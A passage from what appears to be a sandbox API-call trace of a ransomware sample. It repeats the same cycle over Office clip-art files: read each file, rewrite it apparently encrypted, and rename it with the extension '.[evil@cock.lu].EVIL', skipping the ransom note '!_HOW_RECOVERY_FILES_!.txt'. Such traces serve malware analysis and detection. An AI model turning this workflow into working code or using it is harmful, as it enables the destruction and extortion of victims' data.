(_String1="J0148757.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0145.304] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0148757.JPG") returned 0x0 [0145.304] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148757.JPG") returned 0x45 [0145.304] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148757.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148757.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0145.306] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x107d4, lpOverlapped=0x0) returned 1 [0145.309] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.309] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.309] _errno () returned 0x84b1160840 [0145.309] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.309] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x107e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x107e0, lpOverlapped=0x0) returned 1 [0145.309] CloseHandle (hObject=0x1a8) returned 1 [0145.309] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148757.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0145.310] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0145.310] __uncaught_exception () returned 0x84b1160800 [0145.310] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0145.310] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148757.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148757.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148757.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148757.jpg.[evil@cock.lu].evil")) returned 1 [0145.311] ??_V@YAXPEAX@Z () returned 0x1 [0145.314] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148757.JPG", dwFileAttributes=0x200) returned 0 [0145.314] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0145.314] wcsstr (_Str="J0148798.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0145.314] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148798.JPG") returned 69 [0145.314] wcscmp (_String1="J0148798.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0145.314] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0148798.JPG") returned 0x0 [0145.315] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148798.JPG") returned 0x45 [0145.315] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148798.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148798.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0145.316] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x955d, lpOverlapped=0x0) returned 1 [0145.319] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.319] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.319] _errno () returned 0x84b1160840 [0145.319] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.319] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x9560, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x9560, lpOverlapped=0x0) returned 1 [0145.320] CloseHandle (hObject=0x1a8) returned 1 [0145.320] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148798.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0145.320] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0145.320] __uncaught_exception () returned 0x84b1160800 [0145.320] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0145.320] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148798.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148798.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148798.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148798.jpg.[evil@cock.lu].evil")) returned 1 [0145.321] ??_V@YAXPEAX@Z () returned 0x1 [0145.324] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148798.JPG", dwFileAttributes=0x200) returned 0 [0145.324] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0145.324] wcsstr (_Str="J0149018.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0145.324] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149018.JPG") returned 69 [0145.324] wcscmp (_String1="J0149018.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0145.324] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0149018.JPG") returned 0x0 [0145.324] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149018.JPG") returned 0x45 [0145.324] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149018.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0149018.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0145.326] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6b01, lpOverlapped=0x0) returned 1 [0145.329] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.329] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.329] _errno () returned 0x84b1160840 [0145.329] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.329] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x6b20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6b20, lpOverlapped=0x0) returned 1 [0145.330] CloseHandle (hObject=0x1a8) returned 1 [0145.330] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149018.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0145.330] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0145.330] __uncaught_exception () returned 0x84b1160800 [0145.330] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0145.330] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149018.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0149018.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149018.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0149018.jpg.[evil@cock.lu].evil")) returned 1 [0145.331] ??_V@YAXPEAX@Z () returned 0x1 [0145.334] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149018.JPG", dwFileAttributes=0x200) returned 0 [0145.334] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0145.334] wcsstr (_Str="J0149118.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0145.334] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149118.JPG") returned 69 [0145.334] wcscmp (_String1="J0149118.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0145.334] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0149118.JPG") returned 0x0 [0145.334] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149118.JPG") returned 0x45 [0145.334] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149118.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0149118.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0145.336] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xfd22, lpOverlapped=0x0) returned 1 [0145.339] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.339] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.339] _errno () returned 0x84b1160840 [0145.339] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.339] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0xfd40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xfd40, lpOverlapped=0x0) returned 1 [0145.340] CloseHandle (hObject=0x1a8) returned 1 [0145.340] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149118.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0145.340] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0145.340] __uncaught_exception () returned 0x84b1160800 [0145.340] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0145.340] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149118.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0149118.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149118.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0149118.jpg.[evil@cock.lu].evil")) returned 1 [0145.341] ??_V@YAXPEAX@Z () returned 0x1 [0146.236] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149118.JPG", dwFileAttributes=0x200) returned 0 [0146.236] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.236] wcsstr (_Str="J0150150.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.236] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150150.WMF") returned 69 [0146.236] wcscmp (_String1="J0150150.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.236] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0150150.WMF") returned 0x0 [0146.236] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150150.WMF") returned 0x45 [0146.236] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150150.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0150150.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.238] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xb544, lpOverlapped=0x0) returned 1 [0146.250] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.250] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.250] _errno () returned 0x84b1160840 [0146.250] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.250] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0xb560, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xb560, lpOverlapped=0x0) returned 1 [0146.268] CloseHandle (hObject=0x1a8) returned 1 [0146.268] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150150.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.268] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.268] __uncaught_exception () returned 0x84b1160800 [0146.268] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.268] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150150.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0150150.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150150.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0150150.wmf.[evil@cock.lu].evil")) returned 1 [0146.269] ??_V@YAXPEAX@Z () returned 0x1 [0146.272] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150150.WMF", dwFileAttributes=0x200) returned 0 [0146.272] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.272] wcsstr (_Str="J0150861.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.272] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150861.WMF") returned 69 [0146.272] wcscmp (_String1="J0150861.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.272] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0150861.WMF") returned 0x0 [0146.272] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150861.WMF") returned 0x45 [0146.272] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150861.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0150861.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.274] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x212e, lpOverlapped=0x0) returned 1 [0146.276] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.276] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.276] _errno () returned 0x84b1160840 [0146.276] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.276] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x2140, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2140, lpOverlapped=0x0) returned 1 [0146.276] CloseHandle (hObject=0x1a8) returned 1 [0146.276] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150861.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.277] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.277] __uncaught_exception () returned 0x84b1160800 [0146.277] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.277] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150861.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0150861.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150861.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0150861.wmf.[evil@cock.lu].evil")) returned 1 [0146.278] ??_V@YAXPEAX@Z () returned 0x1 [0146.280] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150861.WMF", dwFileAttributes=0x200) returned 0 [0146.281] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.281] wcsstr (_Str="J0151041.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.281] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151041.WMF") returned 69 [0146.281] wcscmp (_String1="J0151041.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.281] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0151041.WMF") returned 0x0 [0146.281] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151041.WMF") returned 0x45 [0146.281] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151041.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151041.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.282] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1104, lpOverlapped=0x0) returned 1 [0146.285] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.285] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.285] _errno () returned 0x84b1160840 [0146.285] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.285] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x1120, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1120, lpOverlapped=0x0) returned 1 [0146.285] CloseHandle (hObject=0x1a8) returned 1 [0146.285] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151041.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.285] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.285] __uncaught_exception () returned 0x84b1160800 [0146.285] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.285] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151041.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151041.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151041.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151041.wmf.[evil@cock.lu].evil")) returned 1 [0146.286] ??_V@YAXPEAX@Z () returned 0x1 [0146.289] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151041.WMF", dwFileAttributes=0x200) returned 0 [0146.289] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.289] wcsstr (_Str="J0151045.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.289] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151045.WMF") returned 69 [0146.289] wcscmp (_String1="J0151045.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.289] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0151045.WMF") returned 0x0 [0146.289] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151045.WMF") returned 0x45 [0146.289] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151045.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151045.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.291] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3c68, lpOverlapped=0x0) returned 1 [0146.304] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.304] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.304] _errno () returned 0x84b1160840 [0146.304] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.304] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x3c80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3c80, lpOverlapped=0x0) returned 1 [0146.304] CloseHandle (hObject=0x1a8) returned 1 [0146.304] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151045.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.304] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.304] __uncaught_exception () returned 0x84b1160800 [0146.304] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.305] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151045.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151045.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151045.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151045.wmf.[evil@cock.lu].evil")) returned 1 [0146.305] ??_V@YAXPEAX@Z () returned 0x1 [0146.308] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151045.WMF", dwFileAttributes=0x200) returned 0 [0146.308] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.308] wcsstr (_Str="J0151047.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.308] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151047.WMF") returned 69 [0146.308] wcscmp (_String1="J0151047.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.308] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0151047.WMF") returned 0x0 [0146.308] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151047.WMF") returned 0x45 [0146.308] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151047.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151047.wmf"), 